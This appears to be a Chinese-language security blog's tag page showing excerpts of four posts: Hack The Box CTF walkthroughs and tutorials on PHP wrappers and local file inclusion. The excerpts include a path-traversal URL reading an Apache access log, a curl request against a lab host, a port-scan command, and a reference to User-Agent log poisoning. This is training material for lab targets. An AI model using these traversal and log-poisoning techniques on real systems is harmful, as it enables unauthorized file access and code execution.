發表文章

目前顯示的是有「web」標籤的文章

Hack The Box(HTB) - CTF Try Out : Flag Command Walkthrough

圖片
 Hack The Box(HTB) - CTF Try Out : Flag Command Walkthrough 靶機資訊如下 名稱 : Flag Command 難度 : 非常簡單 直接開啟來看看 你突然清醒地發現自己置身於一片奇異的外星森林之中。 你到底是怎麼到這裡來的? 內容顯示如下 : 怪誕、難以辨認的聲音在盤根錯節的樹林間迴盪,讓你毛骨悚然。 你環顧四周,發現一個瘦長、咧嘴大笑的身影潛伏在陰影中,像某種瘋狂的咒語一樣低聲念叨著“小丑3n”,顯然是在等你昏過去什麼的。很恐怖吧? 注意!這片森林可不是你奶奶家的後院。 這裡充滿了足以讓恐怖電影都黯然失色的怪異與恐怖。是時候找到出口了。 賭注?哦,沒什麼大不了的。只是你的朋友們,墜入黑暗和絕望的深淵。 點擊“開始”,開啟這場扭曲的冒險! 感覺像是網頁版 RPG 先查看 F12 有甚麼元件,共有三隻 Javascript 請 AI 直接開始破題 觀察選項(應該會出現 4 個方向) HEAD NORTH HEAD SOUTH HEAD EAST HEAD WEST 這些選項與 currentStep = 1 對應,依據 main.js : if (currentCommand == 'HEAD NORTH' ) { currentStep = '2' ; } else if (currentCommand == 'FOLLOW A MYSTERIOUS PATH' ) { currentStep = '3' ; } else if (currentCommand == 'SET UP CAMP' ) { currentStep = '4' ; } 因此你的目標是在輸入特定指令後觸發下一階段邏輯(並最終進入 secret 指令路徑)。 那就輸入 HEAD NORTH 後繼續 AI 依據分析 main.js 的內容後回復如下 非常好,你輸入 HEAD NORTH 之後成功推進劇情,目前系統進入了 currentStep = 2 ,並出現新的四個選項: GO DEEPER INTO THE FOREST FOLLOW A MYSTERIOUS PATH CL...

Hack The Box(HTB) - CTF Try Out : Jailbreak Walkthrough

圖片
 Hack The Box(HTB) - CTF Try Out : Jailbreak Walkthrough 終於又有時間了,這一次改玩 Web,靶機資訊如下 名稱 : Jailbreak (越獄) 難度 : 非常簡單 靶機給了一個 IP 與一個 Port,94.237.54.192:45408,開啟來看看 又是個遊戲風的網站 逛了一圈浪費許多時間在最後的 ROM 發現可以使用 XML 的格式上傳更新 且可以直接在網頁中輸入 XML 的內容 這年頭起手式就是餵給 AI,沒那個美國時間自己看,下面是將現有的 XML 內容餵給 AI 請AI 解釋整段給我的結果 這段 XML 是一個 韌體更新設定檔 (FirmwareUpdateConfig) ,它描述了某裝置或系統進行韌體更新的完整資訊。以下逐層解析: 根元素 <FirmwareUpdateConfig> ... </FirmwareUpdateConfig> 代表這是一個韌體更新的設定檔,裡面包含主要韌體資訊、組件更新內容,以及更新來源網址。 Firmware 區塊 <Firmware> <Version>1.33.7</Version> <ReleaseDate>2077-10-21</ReleaseDate> <Description>Update includes advanced biometric lock functionality for enhanced security.</Description> <Checksum type="SHA-256">9b74c9897bac770ffc029102a200c5de</Checksum> </Firmware> Version :韌體主版本號 → 1.33.7 ReleaseDate :釋出日期 → 2077-10-21 Description :更新說明 → 新增「進階生物辨識鎖定功能」,提升安全性。 Checksum (SHA-256) :韌體檔案完整性驗證值,確保更新檔未被竄改。 Components 區塊 代表韌體中各個子...

PHP Wrappers 包裝器

 PHP Wrappers 包裝器 這裡有一篇介紹 PHP Wrappers 滲透測試的說明寫得不錯,可以先了解流與包裝器的概念 https://www.itread01.com/hkpqlphk.html 回到滲透攻擊,靶機與前一篇一樣是個可以透過 Path Traversal 的網站 ===================================================================== kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php ... <a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a> <!DOCTYPE html> <html lang="en"> <head>     <meta charset="UTF-8">     <meta name="viewport" content="width=device-width, initial-scale=1.0">     <title>Maintenance</title> </head> <body>         <span style="color:#F00;text-align:center;">The admin page is currently under maintenance. ===================================================================== 上述的 BODY 結果中顯示了不完整,結論是部分內容丟失 此時可以先透過包裝器語法 php://filter 測試,發現結果輸出一樣 ===============================================...

文件包含漏洞 LFI & RFI

圖片
 文件包含漏洞 LFI 文件包含漏洞好容易跟目錄遍歷搞混,這裡有一個重點 目錄遍歷是只有讀的權限, 而文件包含漏洞允許在程序運行的代碼中 "包含" 文件 範例手法 : 注入 User-Agent 去包含目標主機本地的執行檔,透過執行輸出要的結果 靶機開始 首先先 rustscan └─$ rustscan -a 192.168.241.16 --ulimit 5000 -t 8000 --scripts -- -n -Pn -sVC 掃完 22、80、2222 open 三個服務分別是 22 - OpenSSH 8.2p1 80 - Apache httpd 2.4.38 2222 - OpenSSH 7.9p1 這一版 Apache 2.4.38 設計成有  Path Traversal(目錄遍歷) 漏洞 路徑為 http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log 透過 curl 測試如下可以看到 Log 內容結果 Burp Suite 也可以看到 Response 顯示 Log 內容 主要內容就是 Apache 紀錄 Client 的存取紀錄如下 <a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a> 192.168.63.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/ HTTP/1.1" 200 2361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" 192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?pa...